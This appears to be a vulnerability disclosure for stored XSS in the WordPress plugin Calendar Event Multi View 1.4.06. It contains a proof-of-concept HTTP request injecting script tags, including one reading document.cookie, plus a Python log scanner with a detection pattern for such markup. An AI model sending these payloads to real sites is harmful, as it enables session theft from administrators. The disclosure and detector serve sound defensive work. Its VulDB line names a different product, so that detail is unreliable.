Submit #43714: Multiple Authenticated (contributor or higher user role) Stored Cross-Site Scripting (XSS) vulnerabilities in Calendar Event Multi View plugin <=1.4.06 at WordPress.

Title: Multiple Authenticated (contributor or higher user role) Stored Cross-Site Scripting (XSS) vulnerabilities in Calendar Event Multi View plugin <=1.4.06 at WordPress.
Description:
# Exploit Title: Multiple Authenticated (contributor or higher user role) Stored Cross-Site Scripting (XSS) vulnerabilities in Calendar Event Multi View plugin <=1.4.06 at WordPress.
# Exploit Author: Mostafa Farzaneh (Mr.Pyweb)
# Web Site: https://wordpress.dwbooster.com/calendars/cp-multi-view-calendar
# Software Homepage: https://wordpress.org/plugins/cp-multi-view-calendar/
# Version: 1.4.06
# Tested on: Windows 10
# Category: WebApp
# Date: 2022-05-25
# Description: An authenticated user is able to inject arbitrary JavaScript or HTML code into the "Admin Calendar Data" page via the Subject and Location parameters. This causes a stored XSS attack against administrators or other users.

POC:
1- Go to the CP Multi View Calendar tab and click on Admin Calendar Data.
2- Click on the calendar and Edit details.
3- Add your payload in the Subject, Location and Description parameters.

Request:
POST /wp/?cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&calid=1&month_index=1&method=adddetails&id=2 HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 366
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

Subject=<script>alert(origin)</script>&colorvalue=%23C60&rrule=&rruleType=&stpartdate=05%2F10%2F2022&stparttime=00%3A00&etpartdate=05%2F16%2F2022&etparttime=00%3A00&stpartdatelast=05%2F10%2F2022&etpartdatelast=05%2F16%2F2022&stparttimelast=&etparttimelast=&IsAllDayEvent=1&Location=<script>alert('hacked')</script>&Description=<script>alert(document.cookie)</script>&timezone=4.5
User: pyweb-security (UID 11883)
Submission: 15.08.2022 12:32 (4 years ago)
Moderated: 16.08.2022 15:46 (1 day later)
Status: Accepted
VulDB Entry: 206487 [MotoPress Timetable and Event Schedule up to 1.4.06 on WordPress Calendar Subject/Location/Description Cross Site Scripting]
Points: 17
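As an added detection example (not part of the submission or the plugin's own code), the following Python scans constructed audit-log lines for POSTs to the plugin's event-saving action (cpmvc_do_action=mvparse with method=adddetails, taken from the request above) whose Subject, Location or Description fields carry markup. The log line format and the sample lines are assumptions; only the query and form parameter names come from the submission.

```python
import re
from html import unescape
from urllib.parse import parse_qs, urlsplit

# Fields the submission reports as stored unescaped by the plugin.
WATCHED_FIELDS = ("Subject", "Location", "Description")
# Markup that has no business in a calendar subject, location or description.
MARKUP = re.compile(r"<\s*(script|img|svg|iframe)\b|\bon[a-z]+\s*=|javascript:", re.I)

# Constructed audit-log lines (assumed format, not real traffic):
# "<client> <method> <path?query> <status> body=<urlencoded form body>"
SAMPLE_LOG = [
    "203.0.113.5 POST /wp/?cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&calid=1&month_index=1&method=adddetails&id=2 200 "
    "body=Subject=%3Cscript%3Ealert(origin)%3C%2Fscript%3E&Location=Room+1&Description=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E",
    "198.51.100.7 POST /wp/?cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&calid=1&month_index=1&method=adddetails&id=3 200 "
    "body=Subject=Team+sync&Location=Room+2&Description=Weekly+status+%26+planning",
    "198.51.100.7 GET /wp/?cpmvc_id=1 200 body=",
]

def is_event_store_request(target: str) -> bool:
    """True when the query string names the plugin action that saves event details."""
    qs = parse_qs(urlsplit(target).query)
    return qs.get("cpmvc_do_action") == ["mvparse"] and qs.get("method") == ["adddetails"]

def suspicious_fields(body: str) -> dict:
    """Map each watched field to its decoded value when that value contains markup."""
    form = parse_qs(body, keep_blank_values=True)  # percent-decodes values, splits on '&'
    hits = {}
    for name in WATCHED_FIELDS:
        for value in form.get(name, []):
            decoded = unescape(value)  # also catches entity-encoded attempts (&lt;script&gt;)
            if MARKUP.search(decoded):
                hits[name] = decoded
    return hits

def scan(lines):
    """Return (client, [fields]) for every event-store POST carrying markup in a watched field."""
    findings = []
    for line in lines:
        client, method, target, _status, body = line.split(" ", 4)
        if method != "POST" or not is_event_store_request(target):
            continue
        hits = suspicious_fields(body[len("body="):])
        if hits:
            findings.append((client, sorted(hits)))
    return findings

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))  # → [('203.0.113.5', ['Description', 'Subject'])]
```

Access logs normally omit POST bodies, so feed this a WAF or ModSecurity audit log (or a request mirror) rather than the plain access log; the query-string match alone can still be applied to access logs to find who used the event-saving action.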
